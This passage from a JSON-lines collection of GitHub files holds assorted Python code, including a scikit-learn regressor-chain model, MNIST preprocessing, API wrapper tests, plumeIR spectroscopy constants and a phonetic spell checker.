\"content-type\": \"application/json\"\n },\n \"detail\": json.loads(base64.b64decode(payload[\"data\"]).decode(\"utf-8\"))\n\n }\n\n print(json.dumps(result))\n\n return result","repo_name":"nwoodson-ctech/core-domain","sub_path":"player/lambda_function/runtime/stream_add_player.py","file_name":"stream_add_player.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73907021531","text":"import os\n\nfrom ..utils import Input\n\nfrom ..day_05 import part1, part2\n\nINPUT_DIRECTORY = os.path.join(\n os.path.dirname(os.path.dirname(os.path.abspath(__file__))), \"inputs\"\n)\nsource = Input(\"{}/{}\".format(INPUT_DIRECTORY, \"05.input\"), mapt=None, split=None)\n\n\ndef test_solve_part1():\n code = list(map(int, source.split(\",\")))\n outputs = part1(code, iter([1]))\n assert outputs[-1] == 6069343\n\n\ndef test_solve_part2():\n code = list(map(int, source.split(\",\")))\n outputs = part1(code, iter([5]))\n assert outputs[-1] == 3188550\n","repo_name":"luxcem/advent-2019","sub_path":"src/tests/test_05.py","file_name":"test_05.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25314035873","text":"import sys\nfrom pathlib import Path\n\nfrom trent.abt import sklearn_cv_data as cv_data\n\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.multioutput import RegressorChain\nfrom sklearn.linear_model import Ridge\nfrom sklearn.metrics import mean_squared_error\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# paths for packages\nloader_path = Path(__file__).resolve().parents[2]\nsys.path.append(loader_path)\n\n \nclass Regressor_Chain():\n\n def __init__(\n self, srcfile: str, folds: int = 5, repeats: int = 1, seed: int = 0, l2_lambda: float = 0.001, verbose: bool=False\n ):\n \"\"\"Initialize the orchestrator.\n\n Args:\n srcfile (str): path to the ABT CSV\n folds (int): number of CV folds per repeat\n repeats (int): number of repeats, shuffling each time\n batch_size (int): eventual torch dataloader batch size\n \"\"\"\n # Load the data\n self.data = pd.read_csv(srcfile)\n self.folds = folds\n self.repeats = repeats\n self.seed = seed\n self.l2_lambda = l2_lambda\n self.verbose = verbose\n\n # create the model\n self.model = Ridge(alpha=self.l2_lambda, random_state=self.seed)\n\n # set seed\n np.random.seed(self.seed)\n\n # data loader initialisation\n self.orchestrator = orchestrator = cv_data.RepeatedStratifiedGroupKFoldOrchestrator(\n \"/Users/carl/Documents/code_repos/emer2gent-covid19/data/model_abt.csv\", # TODO: need to update for final ABT location\n repeats=self.repeats,\n folds=self.folds,\n )\n self.features, self.num_features = cv_data.abt_info()\n\n\n\n # run model for data above:\n def execute(self):\n\n health_first_repeat_dict = {}\n econ_first_repeat_dict = {}\n for i, repeat in enumerate(self.orchestrator): # each repetition of cv\n health_first_fold_dict = {}\n econ_first_fold_dict = {}\n for k, (tr, te) in enumerate(repeat): # each fold within a cv iteration\n \n X_train = tr[0][0]\n y_train = tr[0][1]\n z_train = tr[0][2]\n\n X_val = te[0][0]\n y_val = te[0][1]\n z_val = te[0][2]\n\n run_iter = f'rpt_{i}_fold_{k}'\n # path to save checkpoints to\n\n # econ model adjusted for health model\n r_chain_1 = RegressorChain(\n self.model, \n order=[0,1],\n cv=5,\n random_state=self.seed\n )\n\n r_chain_1.fit(X_train, y_train)\n y_pred = r_chain_1.predict(X_val)\n score_1 = mean_squared_error(y_val, y_pred, sample_weight=z_val)\n models = r_chain_1.estimators_\n health_model_1 = models[0]\n econ_model_1 = models[1]\n \n\n # econ model adjusted for health model\n r_chain_2 = RegressorChain(\n self.model, \n order=[1,0],\n cv=5,\n random_state=self.seed\n )\n r_chain_2.fit(X_train, y_train)\n y_pred = r_chain_2.predict(X_val)\n score_2 = mean_squared_error(y_val, y_pred, sample_weight=z_val)\n models = r_chain_2.estimators_\n health_model_2 = models[1]\n econ_model_2 = models[0]\n\n if self.verbose: print(f'Repeat: {i}, Fold: {k}, Validation Results: Model_1: {score_1}, Model_2: {score_2}')\n \n health_first_fold_dict[k] = [health_model_1.coef_, econ_model_1.coef_]\n econ_first_fold_dict[k] = [health_model_2.coef_, econ_model_2.coef_]\n\n \n health_first_repeat_dict[i] = health_first_fold_dict\n econ_first_repeat_dict[i] = econ_first_fold_dict\n\n return health_first_repeat_dict, econ_first_repeat_dict\n\n def graph_builder(\n self, \n health_first_repeat_dict, \n econ_first_repeat_dict, \n height: float=1.25, \n aspect: float=8, \n low_lim: float=-5, \n high_lim: float=10,\n plot=1,\n save=False\n ):\n\n run = [f'Run {i}' for i in range(self.repeats*self.folds)]\n\n # MODEL 1:\n if plot == 1 or plot == 2:\n # select the health first model and format the coeffs for use in graphs\n health_first_coeffs = [health_first_repeat_dict[i][j] for i in range(self.repeats) for j in range(self.folds)]\n health_coeffs_1 = np.array([item[0] for item in health_first_coeffs])\n econ_coeffs_1 = np.array([item[1] for item in health_first_coeffs])\n econ_coeffs_1 = econ_coeffs_1[:,:self.num_features] # want only the feature coefficients, ignores the other target dependent coeff \n \n # create dataframe of all model runs and select the order based on median\n health_df_1 = pd.DataFrame(health_coeffs_1, index=run, columns=self.features)\n health_order_1 = health_df_1.describe().loc['50%',:].sort_values(ascending=False).index.tolist()\n econ_df_1 = pd.DataFrame(econ_coeffs_1, index=run, columns=self.features)\n econ_order_1 = econ_df_1.describe().loc['50%',:].sort_values(ascending=False).index.tolist()\n\n # reshape dataframes for plotting distribution graphs\n health_df_1 = pd.melt(health_df_1, value_vars=self.features, var_name='feature', value_name='coeff_value')\n econ_df_1 = pd.melt(econ_df_1, value_vars=self.features, var_name='feature', value_name='coeff_value')\n\n if plot == 1:\n # create graphs for model_1\n g_health_1 = sns.FacetGrid(health_df_1, row=\"feature\", row_order=health_order_1,\n height=height, aspect=aspect, xlim=(low_lim, high_lim))\n g_health_1.map(sns.distplot, 'coeff_value', rug=True, hist=False, color=\"grey\", kde_kws={\"shade\": True})\n\n plt.subplots_adjust(top=0.95)\n g_health_1.fig.suptitle('Health Feature Coefficients, Economic dependent on Health Output') \n\n if save: plt.savefig('/Users/carl/Documents/code_repos/emer2gent-covid19/data/result_graphs/health_1.png')\n\n plt.show()\n \n elif plot == 2:\n g_econ_1 = sns.FacetGrid(econ_df_1, row=\"feature\", row_order=econ_order_1,\n height=height, aspect=aspect, xlim=(low_lim, high_lim))\n g_econ_1.map(sns.distplot, 'coeff_value', rug=True, hist=False, color=\"grey\", kde_kws={\"shade\": True})\n\n plt.subplots_adjust(top=0.95)\n g_econ_1.fig.suptitle('Economic Feature Coefficients, Economic dependent on Health Output') \n\n if save: plt.savefig('/Users/carl/Documents/code_repos/emer2gent-covid19/data/result_graphs/econ_1.png')\n\n plt.show()\n\n\n # MODEL 2:\n elif plot == 3 or plot == 4:\n\n # select the health first model and format the coeffs for use in graphs\n econ_first_coeffs = [econ_first_repeat_dict[i][j] for i in range(self.repeats) for j in range(self.folds)]\n health_coeffs_2 = np.array([item[0] for item in econ_first_coeffs])\n health_coeffs_2 = health_coeffs_2[:,:self.num_features] # want only the feature coefficients, ignores the other target dependent coeff \n econ_coeffs_2 = np.array([item[1] for item in econ_first_coeffs])\n\n\n # create dataframe of all model runs and select the order based on median\n health_df_2 = pd.DataFrame(health_coeffs_2, index=run, columns=self.features)\n health_order_2 = health_df_2.describe().loc['50%',:].sort_values(ascending=False).index.tolist()\n econ_df_2 = pd.DataFrame(econ_coeffs_2, index=run, columns=self.features)\n econ_order_2 = econ_df_2.describe().loc['50%',:].sort_values(ascending=False).index.tolist()\n\n # reshape dataframes for plotting distribution graphs\n health_df_2 = pd.melt(health_df_2, value_vars=self.features, var_name='feature', value_name='coeff_value')\n econ_df_2 = pd.melt(econ_df_2, value_vars=self.features, var_name='feature', value_name='coeff_value')\n\n # create graphs for model_1\n\n if plot == 3:\n g_health_2 = sns.FacetGrid(health_df_2, row=\"feature\", row_order=health_order_2,\n height=height, aspect=aspect, xlim=(low_lim, high_lim))\n g_health_2.map(sns.distplot, 'coeff_value', rug=True, hist=False, color=\"grey\", kde_kws={\"shade\": True})\n\n plt.subplots_adjust(top=0.95)\n g_health_2.fig.suptitle('Health Feature Coefficients, Health dependent on Economic Output') \n\n if save: plt.savefig('/Users/carl/Documents/code_repos/emer2gent-covid19/data/result_graphs/health_2.png')\n\n plt.show()\n\n elif plot == 4:\n g_econ_2 = sns.FacetGrid(econ_df_2, row=\"feature\", row_order=econ_order_2,\n height=height, aspect=aspect, xlim=(low_lim, high_lim))\n g_econ_2.map(sns.distplot, 'coeff_value', rug=True, hist=False, color=\"grey\", kde_kws={\"shade\": True})\n\n plt.subplots_adjust(top=0.95)\n g_econ_2.fig.suptitle('Economic Feature Coefficients, Health dependent on Economic Output') \n\n if save: plt.savefig('/Users/carl/Documents/code_repos/emer2gent-covid19/data/result_graphs/econ_2.png')\n\n plt.show()\n\n\n else: print('Plot chosen not available')\n \n\n\nif __name__ == \"__main__\":\n execute()\n","repo_name":"ElderResearch/emer2gent-covid19","sub_path":"src/python/pkg/trent/models/regressor_chain.py","file_name":"regressor_chain.py","file_ext":"py","file_size_in_byte":10675,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"1674447679","text":"import csv\nimport random\nimport os\n\n\n# loads data and returns it in 2 lists- data and labels\ndef load_raw_data(path, limit = 1000000):\n\n train_raw = []\n with open(path, 'r') as csv_file:\n csv_reader = csv.reader(csv_file)\n i = 0\n for line in csv_reader:\n if line:\n i +=1\n train_raw.append(line)\n if i >= limit:\n break\n\n train_targets = []\n for each in train_raw:\n if each:\n label = each.pop(0)\n train_targets.append(label)\n return train_raw, train_targets\n\n\n# returns normalized data\ndef normalize_raw_data(raw):\n new_data = []\n for each in raw:\n if each:\n new_data.append([int(x)/255 for x in each])\n return new_data\n\n\n# returns data as list of 10 elements\ndef normalize_target_data(raw):\n new_data = []\n for each in raw:\n if each:\n normalized = [0 for x in range(10)]\n normalized[int(each)] = 1\n new_data.append(normalized)\n return new_data\n\n\ndef save_normalized_train_data(normal_train_data, new_file_name):\n with open(new_file_name, 'w', newline='') as newfile:\n csv_writer = csv.writer(newfile)\n for each in normal_train_data:\n if each:\n csv_writer.writerow(each)\n\n\ndef save_normalized_labels_data(normal_train_labels, new_file_name):\n with open(new_file_name, 'w', newline='') as newfile:\n csv_writer = csv.writer(newfile)\n for each in normal_train_labels:\n if each:\n csv_writer.writerow(each)\n\n\n# downloads data, shuffles it, saves it again\ndef shuffle(data_file, labels_file):\n data = []\n labels = []\n seed = random.random()\n with open(data_file, 'r') as file:\n csv_reader = csv.reader(file)\n i = 0\n for line in csv_reader:\n data.append(line)\n i += 1\n if i >= 60000:\n break\n\n print('downloaded...', end=' ')\n random.seed(seed)\n random.shuffle(data)\n os.remove(data_file)\n\n print('shuffled...', end=' ')\n with open(data_file, 'w', newline='') as file:\n writer = csv.writer(file)\n for line in data:\n writer.writerow(line)\n data = []\n print('saved')\n\n with open(labels_file, 'r') as file:\n csv_reader = csv.reader(file)\n i = 0\n for line in csv_reader:\n labels.append(line)\n i += 1\n if i >= 60000:\n break\n print('downloaded...', end=' ')\n random.seed(seed)\n random.shuffle(labels)\n os.remove(labels_file)\n print('shuffled...', end=' ')\n\n with open(labels_file, 'w', newline='') as file:\n writer = csv.writer(file)\n for line in labels:\n writer.writerow(line)\n labels = []\n print('saved')\n\n# script to save normalized data\n\n'''\nif __name__ == \"__main__\":\n\n\n raw_train_data, raw_train_labels = load_raw_data('mnist_train.csv')\n\n train_data = normalize_raw_data(raw_train_data)\n train_labels = normalize_target_data(raw_train_labels)\n save_normalized_train_data(train_data, 'training_data.csv')\n save_normalized_labels_data(train_labels, 'training_labels.csv')\n\nraw_test_data, raw_test_labels = load_raw_data('mnist_test.csv')\n\ntest_data = normalize_raw_data(raw_test_data)\ntest_labels = normalize_target_data(raw_test_labels)\n\nsave_normalized_train_data(test_data, 'test_data.csv')\nsave_normalized_labels_data(test_labels, 'test_labels.csv')\n\n\n\ndata, labels = load_raw_data('mnist_train.csv', 1000)\nnormal_data = normalize_raw_data(data)\nnormal_labels = normalize_target_data(labels)\nsave_normalized_train_data(normal_data, 'test_data.csv')\nsave_normalized_labels_data(normal_labels, 'test_labels.csv')\n'''\n","repo_name":"borisengler/Neural-Network","sub_path":"Data_managment.py","file_name":"Data_managment.py","file_ext":"py","file_size_in_byte":3776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25066717271","text":"import numpy,matplotlib\nimport matplotlib.pyplot as plt\n\ndef render(x,w,h,vmax=0.1):\n x = x.reshape([h,w,62,47])\n z = numpy.ones([h,w,64,49])*vmax\n z[:,:,1:-1,1:-1] = x\n x = z.reshape([h,w,64,49]).transpose([0,2,1,3]).reshape([h*64,w*49])\n plt.figure(figsize=(0.49*2*w,0.64*2*h))\n plt.imshow(x,cmap=plt.cm.gray,vmin=-vmax,vmax=vmax)\n plt.axis('off')\n plt.show()\n\ndef scatterplot(x,y,xlabel='',ylabel=''):\n plt.figure(figsize=(3,3))\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.plot(x,y,'.')\n plt.show()\n\n","repo_name":"moritz-gerster/machine_learning1","sub_path":"Week03_Principal-Component-Analysis/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"10983472526","text":"#!/usr/bin/env pytest -vs\n\"\"\"Tests for NotePage objects in pws-api-wrapper.\"\"\"\n\n# Third-Party Libraries\nimport pytest\nfrom schema import SchemaError\nimport vcr\n\n# Custom Libraries\nfrom pws_api_wrapper import NotePage\n\n\nclass TestNotePage:\n \"\"\"Tests for the NotePage.\"\"\"\n\n @vcr.use_cassette(\"tests/vcr_cassettes/notePage/create-200.yml\")\n def test_create_200(self, notePage_dict):\n \"\"\"Test an API call to create a Note Page.\"\"\"\n # Delete id as teh API will not accept when creating.\n del notePage_dict[\"id\"]\n\n notePage = NotePage(**notePage_dict)\n\n message = notePage.create()\n\n # Add note page ID back to notePage_dict\n notePage_dict[\"id\"] = notePage.id\n\n assert isinstance(notePage, NotePage)\n assert notePage.to_dict() == notePage_dict\n assert message == \"Note Page Engagement Test Note (1ab5Mqoy) created.\"\n\n @vcr.use_cassette(\"tests/vcr_cassettes/notePage/create-400.yml\")\n def test_create_400(self, notePage_dict):\n \"\"\"Test an API call to fail at creating a Note Page.\"\"\"\n # Add a fake engagement id to cause an error.\n notePage_dict[\"oid\"] = \"12345678\"\n\n notePage = NotePage(**notePage_dict)\n\n message = notePage.create()\n\n assert isinstance(notePage, NotePage)\n assert message == \"Error: Invalid engagements ID\"\n\n @vcr.use_cassette(\"tests/vcr_cassettes/notePage/delete-200.yml\")\n def test_delete_200(self, notePage_dict):\n \"\"\"Test an API call to delete a Note Page.\"\"\"\n notePage = NotePage(**notePage_dict)\n\n message = notePage.delete()\n\n assert message == \"Note Page Engagement Test Note (1ab5Mqoy) deleted.\"\n\n @vcr.use_cassette(\"tests/vcr_cassettes/notePage/delete-400.yml\")\n def test_delete_400(self, notePage_dict):\n \"\"\"Test an API call to delete a Note Page that is note found.\"\"\"\n notePage_dict[\"id\"] = \"abcd1234\"\n\n notePage = NotePage(**notePage_dict)\n\n message = notePage.delete()\n\n assert message == \"Error: Note Page Engagement Test Note (abcd1234) not found.\"\n\n @vcr.use_cassette(\"tests/vcr_cassettes/notePage/get-200.yml\")\n def test_get_200(self, notePage_dict):\n \"\"\"Test an API call to getting a Note Page.\"\"\"\n notepad = NotePage.get(\"1ab5Mqoy\")\n\n assert isinstance(notepad, NotePage)\n assert notepad.to_dict() == notePage_dict\n\n @vcr.use_cassette(\"tests/vcr_cassettes/notePage/get-400.yml\")\n def test_get_400(self, notePage_dict):\n \"\"\"Test an API call to fail at getting a Note Page.\"\"\"\n with pytest.raises(SystemExit):\n NotePage.get(\"abcd1234\")\n\n def test_init_validation_pass(self, notePage_dict):\n \"\"\"Test the init validation.\"\"\"\n notePage = NotePage(**notePage_dict)\n\n assert notePage.to_dict() == notePage_dict\n\n @pytest.mark.parametrize(\n \"attribute,value,error_message\",\n [\n (\"id\", 4, '\"id\" should be 8 alphanumeric characters'),\n (\"id\", \"asd123\", '\"id\" should be 8 alphanumeric characters'),\n (\"id\", \"abcd123!\", '\"id\" should be 8 alphanumeric characters'),\n (\"oid\", 4, '\"oid\" should be 8 alphanumeric characters'),\n (\"oid\", \"asd123\", '\"oid\" should be 8 alphanumeric characters'),\n (\n \"oid\",\n \"abcd123!\",\n '\"oid\" should be 8 alphanumeric characters',\n ),\n (\"title\", \"\", 'Note Page \"title\" is required.'),\n (\"content\", 1, '\"contented\" should be a string or None.'),\n (\n \"otype\",\n \"green\",\n '\"otype\" should be one of the following:',\n ),\n ],\n )\n def test_init_validation_fail(self, attribute, value, error_message, notePage_dict):\n \"\"\"Test the init validation fails when string value are not strings.\"\"\"\n notePage_dict[attribute] = value\n with pytest.raises(SchemaError, match=error_message):\n NotePage(**notePage_dict)\n\n @vcr.use_cassette(\"tests/vcr_cassettes/notePage/update-200.yml\")\n def test_update_200(self, notePage_dict):\n \"\"\"Test an API call to put an update to a NotePad.\"\"\"\n notePage_dict[\"content\"] = \"New Content\"\n\n notePage = NotePage(**notePage_dict)\n\n message = notePage.update()\n\n assert isinstance(notePage, NotePage)\n assert notePage.to_dict() == notePage_dict\n assert message == \"Note Page Engagement Test Note (1ab5Mqoy) updated.\"\n\n @vcr.use_cassette(\"tests/vcr_cassettes/notePage/update-400.yml\")\n def test_update_400(self, notePage_dict):\n \"\"\"Test an API call to update a Note Page with missing object.\"\"\"\n notePage_dict[\"id\"] = \"abcd1234\"\n notePage = NotePage(**notePage_dict)\n\n message = notePage.update()\n\n assert isinstance(notePage, NotePage)\n assert message == \"Error: Not Found\"\n","repo_name":"bjb28/pws-api-wrapper","sub_path":"tests/test_notePages.py","file_name":"test_notePages.py","file_ext":"py","file_size_in_byte":4909,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"13084045107","text":"\"\"\"\nWritten by @jfsmekens - Last updated 01/04/2022\n\nThis module contains a series of constants associated with gas species, as well as\n lists of colors and descriptors used to format plots\n\n\"\"\"\n# Known extensions for MIDAC files\nmidac_extensions = ['spc', 'sbm', 'ifg', 'sb', 'abs']\n\n# Invalid Extensions: do not include those when searching for spectra in a directory\ninvalid_extensions = ['pkl', 'csv', 'txt', 'ini', 'dat', 'xls', 'xlsx', 'doc', 'docx', 'jpg', 'png']\n\n# Gas species in RFM + those extracted from NIST\nrfm_gases = ['H2O', 'CO2', 'SO2', 'CO', 'NO', 'O3', 'N2O', 'NO2', 'NH3', 'HNO3', 'CH4', 'O2', 'HCl', 'HF', 'HBr',\n 'HI', 'H2S', 'N2', 'ClO', 'SF6', 'SO3']\nspecial_gases = ['SiF4']\npossible_gases = rfm_gases + special_gases\n\npossible_aeros = ['H2SO4', 'ASH', 'WATER']\n\n# Interesting Ratios: If any combination of 2 targets makes one of those ratios, it will be plotted\ninteresting_ratios = ['CO2:SO2', 'H2O:SO2', 'H2O:CO2', 'CO:SO2', 'SO2:HCl', 'SO2:HF', 'SO2:H2S', 'SO2:SO3',\n 'SO2:SiF4', 'HCl:HF', 'SO2:H2SO4', 'SO4:SO2', 'H2SO4:ASH', 'H2O:WATER', 'N/A:N/A']\n\n# Continuum Gases: gases in this list are treated differently when creating a reference\n# (include gases with continuum and/or line mixing issues)\ncontinuum_gases = ['H2O', 'CO2']\n\n# Available Apodization functions for the ILS\napod_types = ['Boxcar', 'Uniform', 'Triangular', 'Blackman-Harris', 'Happ-Genzel', 'Hamming', 'Lorenz', 'Gaussian',\n 'NB weak', 'NB medium', 'NB strong', 'Cosine']\n\n# Molecular weights of all gases\nweights = {'H2O': 18.01528,\n 'CO2': 44.01,\n 'O3': 48,\n 'N2O': 44.013,\n 'CH4': 16.04,\n 'O2': 15.999,\n 'SO2': 64.066,\n 'SO3': 80.06,\n 'HCl': 36.458,\n 'HF': 20.01,\n 'CO': 28.01,\n 'NH3': 17.031,\n 'SiF4': 104.0791,\n 'H2S': 34.1,\n 'H2SO4': 98.079,\n 'ASH': 65.0,\n 'WATER': 18.01528,\n 'ICE': 18.01528}\n\n# Plot Colors: A dedicated color for each target species\nplot_colors = {'H2O_sc': 'lightblue',\n 'H2O': 'tab:blue',\n 'CO2': 'tab:orange',\n 'O3': 'tab:pink',\n 'N2O': 'gold',\n 'CH4': 'darkviolet',\n 'SO2': 'tab:red',\n 'SO3': 'tab:orange',\n 'CO': 'maroon',\n 'HCl': 'cyan',\n 'HF': 'magenta',\n 'NH3': 'yellow',\n 'SiF4': 'purple',\n 'H2S': 'olivedrab',\n 'H2SO4': 'tab:green',\n 'ASH': 'tab:grey',\n 'WATER': 'deepskyblue',\n 'gas_temp': 'orange',\n 'E_frac': 'k',\n 'fov': 'k',\n 'max_opd': 'k',\n 'R2': 'k',\n 'RMSE': 'k',\n 'N/A': 'w',\n 'meas': 'k',\n 'model': 'r',\n 'bkg': 'r',\n 'res': 'k',\n 'scat_all': 'tab:grey',\n 'scat_scroll': 'tab:red',\n 'scat_last': 'b',\n 'regress': 'k',\n 'intercept': 'darkcyan',\n 'confidence': 'k'}\ndark_colors = {'H2O_sc': 'lightblue',\n 'H2O': 'tab:blue',\n 'CO2': 'tab:orange',\n 'O3': 'tab:pink',\n 'N2O': 'gold',\n 'CH4': 'darkviolet',\n 'SO2': 'tab:red',\n 'CO': 'maroon',\n 'HCl': 'cyan',\n 'HF': 'magenta',\n 'NH3': 'yellow',\n 'SiF4': 'purple',\n 'H2S': 'olivedrab',\n 'H2SO4': 'tab:green',\n 'ASH': 'tab:grey',\n 'WATER': 'deepskyblue',\n 'gas_temp': 'orange',\n 'fov': 'w',\n 'max_opd': 'w',\n 'R2': 'w',\n 'RMSE': 'w',\n 'N/A': 'k',\n 'meas': 'w',\n 'model': 'r',\n 'bkg': 'r',\n 'res': 'w',\n 'scat_all': 'w',\n 'scat_scroll': 'tab:pink',\n 'scat_last': 'dodgerblue',\n 'regress': 'w',\n 'intercept': 'tab:cyan',\n 'confidence': 'w'}\n\n# Plot Color Maps: A dedicated colormap for each species\nplot_cmaps = {'H2O': 'Blues',\n 'CO2': 'Oranges',\n 'O3': 'RdPu',\n 'SO2': 'Reds',\n 'CO': 'YlOrBr',\n 'HCl': 'GnBu',\n 'HF': 'PuRd',\n 'NH3': 'YlOrBr',\n 'SiF4': 'Purples',\n 'H2S': 'YlOrBr',\n 'H2SO4': 'Greens',\n 'ASH': 'Greys',\n 'WATER': 'Blues',\n 'R2': 'Greys',\n 'RMSE': 'Greys',\n 'dt_prox': 'Oranges',\n 'dt_plume': 'Reds'}\n\n# Pretty name: Mathtext for each species to use in labels\npretty_names = {'H2O': '$H_2O$',\n 'SO2': '$SO_2$',\n 'SO3': '$SO_3$',\n 'CO2': '$CO_2$',\n 'NH3': '$NH_3$',\n 'O3': '$O_3$',\n 'N2O': '$N_2O$',\n 'CH4': '$CH_4$',\n 'CO': '$CO$',\n 'HCl': '$HCl$',\n 'HF': '$HF$',\n 'SiF4': '$SiF_4$',\n 'H2S': '$H_2S$',\n 'SO4': '$SO_4$',\n 'H2SO4': '$SO_4$ $aerosol$',\n 'ASH': '$ash$',\n 'WATER': '$H_2O$ $aerosol$',\n 'ICE': '$ICE$',\n 'time': 'Local Time',\n 'R2': '$R^2$',\n 'RMSE': 'RMS error',\n 'gas_temp': '$T_{gas}$',\n 'E_frac': r'$X{\\epsilon}$',\n 'fov': '$FOV$',\n 'max_opd': '$OPD_{max}$',\n 'N/A': '$n/a$'}\n\n# Pretty Ratios: Use the math text in pretty_names to create pretty ratios for labels\npretty_ratios = {}\nfor ratio in interesting_ratios:\n yname, xname = ratio.split(':')\n pretty_ratios[ratio] = ':'.join([pretty_names[yname], pretty_names[xname]])\n\n# Pretty Units: Mathtext with the units of SCD in molar or mass\npretty_labels = {'molar': ' SCD [$molec \\cdot cm^{-2}$]',\n 'mass': ' SCD [$g \\cdot m^{-2}$]'}\n\n# Logo: The plumeIR_dev logo, version and fonts to display them\nlogotext = 'plumeIR'\nlogofont = {'family': 'Palatino',\n 'color': 'tab:red',\n 'weight': 'bold',\n 'style': 'italic',\n 'size': 18}\nversiontext = 'v0.7'\nversionfont = {'family': 'Palatino',\n 'color': 'tab:red',\n 'weight': 'normal',\n 'style': 'italic',\n 'size': 10}\n\n# Primary windows\nprimary_windows = {'SO2': [2400, 2550],\n 'HCl': [2600, 2900],\n 'HF': [4000, 4100],\n 'CO2': [2020, 2150],\n 'SiF4': [1010, 1040]}\n\n# Secondary windows\nsecondary_windows = {'SO2': [1080, 1120],\n 'HCl': [5730.0, 5780.0],\n 'HF': [4000, 4100],\n 'CO2': [2020, 2150]}\n# Microwindows\nmicro_windows = {'SO2': [2400, 2550],\n 'HCl': [[2727.0, 2728.5], [2775.0, 2776.50], [2818.75, 2820.35], [2820.75, 2822.35], [2843.0, 2844.4],\n [2903.35, 2904.85], [2923.0, 2924.50], [2925.0, 2926.75], [2942.0, 2943.5], [2960.3, 2961.825],\n [2962.3, 2964.0], [2995.0, 2996.5]],\n 'HF': [4000, 4100],\n 'CO2': [2020, 2150]}\n\n# Unit notations\nunits = {'rad': '$mW$ / ($m^{2} \\cdot sr \\cdot cm^{-1}$)',\n 'bbt': '$K$',\n 'opt': '$a.u.$',\n 'wn': '$cm^{-1}$',\n 'um': '$\\mu$$m$',\n 'nm': '$nm$',\n 'molec.cm^-2': '$molec \\cdot cm^{-2}$',\n 'ppmm': '$ppm \\cdot m$',\n 'g.m^-2': '$g \\cdot m^{-2}$',\n 'ppmv': '$ppm$',\n 'relh': '$%$',\n 'N_density': '$cm^{-3}',\n 'N_density_SI': '$m^{-3}',\n 'g.cm^-3': '$g \\cdot cm^{-3}$',\n 'g.m^-3': '$g \\cdot m^{-3}$'}\n\n\n\n","repo_name":"jfsmekens/plumeIR","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":8031,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"29946113557","text":"\ndef can_enter_cave(x):\n x.append(\"Blank for Reasons I can't comprehend.\")\n setx = \"\"\n sety = \"\"\n row0 = x[0]\n row1 = x[1]\n row2 = x[2]\n row3 = x[3]\n row4 = x[4]\n print(row0)\n print(row1)\n print(row2)\n print(row3)\n print(row4)\n count = 0\n \n \n for j in range(7):\n count = 0\n if j < 1:\n pass\n else:\n sety = setx\n setx = \"\"\n for i in range(5):\n if get(i,j,row0,row1,row2,row3,row4) == 0:\n setx = setx + \"0\"\n else:\n setx = setx + \"1\"\n if j > 0:\n for i in range(5):\n if setx[i] == \"0\":\n if sety[i] == \"0\":\n count += 1\n if count == 0:\n print(\"False\")\n return False\n else:\n pass\n print(\"True\")\n return True\n \ndef get(x,y,row0,row1,row2,row3,row4):\n if x == 0:\n return row0[y]\n if x == 1:\n return row1[y]\n if x == 2:\n return row2[y]\n if x == 3:\n return row3[y]\n if x == 4:\n return row4[y]\n if x == 5:\n return row5[y]\n if x == 6:\n return row6[y]\n if x == 7:\n return row7[y]\n \ndef chkxl(x):\n if x == 0:\n return False\n else:\n return True\ndef chkxu(x):\n if x == 3:\n return False\n else:\n return True\ndef chkyl(y):\n if y == 0:\n return False\n else:\n return True\ndef chkyu(y):\n if y == 7:\n return False\n else:\n return True\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"LM5d2b6YG5vXuYiME_11.py","file_name":"LM5d2b6YG5vXuYiME_11.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72701530652","text":"# -*- coding: utf-8 -*-\r\n\r\nimport time\r\nimport Levenshtein\r\nimport jellyfish\r\nfrom functools import partial\r\nfrom multiprocessing import Pool\r\n\r\n\r\ndef levenshtein(seq1, seq2):\r\n return Levenshtein.ratio(seq1, seq2)\r\n\r\n\r\ndef compare(word1, dictionary):\r\n c1_1 = jellyfish.soundex(word1)\r\n c2_1 = jellyfish.metaphone(word1)\r\n c3_1 = jellyfish.nysiis(word1)\r\n c4_1 = jellyfish.match_rating_codex(word1)\r\n\r\n result = (0, None)\r\n\r\n for word2 in dictionary:\r\n c1_2 = jellyfish.soundex(word2)\r\n c2_2 = jellyfish.metaphone(word2)\r\n c3_2 = jellyfish.nysiis(word2)\r\n c4_2 = jellyfish.match_rating_codex(word2)\r\n c1 = levenshtein(c1_1, c1_2)\r\n c2 = levenshtein(c2_1, c2_2)\r\n c3 = levenshtein(c3_1, c3_2)\r\n c4 = levenshtein(c4_1, c4_2)\r\n\r\n sim = c1 * 0.2 + c2 * 0.3 + c3 * 0.3 + c4 * 0.2\r\n\r\n if sim > result[0]:\r\n result = (sim, word2)\r\n\r\n return result\r\n\r\n\r\ndef file_input(file_name):\r\n file_content = list()\r\n with open(file_name, 'r') as lines:\r\n for line in lines:\r\n line = line.strip()\r\n if line:\r\n file_content.append(line)\r\n return file_content\r\n\r\ndef identity(cor_list, result):\r\n length = len(result)\r\n count = 0\r\n\r\n for i in range(length):\r\n if cor_list[i] == result[i][1]:\r\n count += 1\r\n accuracy = count / length\r\n return accuracy\r\n\r\n\r\n# @warps()\r\ndef check():\r\n dictionary = file_input(\"dict.txt\")\r\n mis_list = file_input(\"mis.txt\")\r\n cor_list = file_input(\"cor.txt\")\r\n\r\n pool = Pool(8)\r\n partial_compare = partial(compare, dictionary=dictionary)\r\n result = 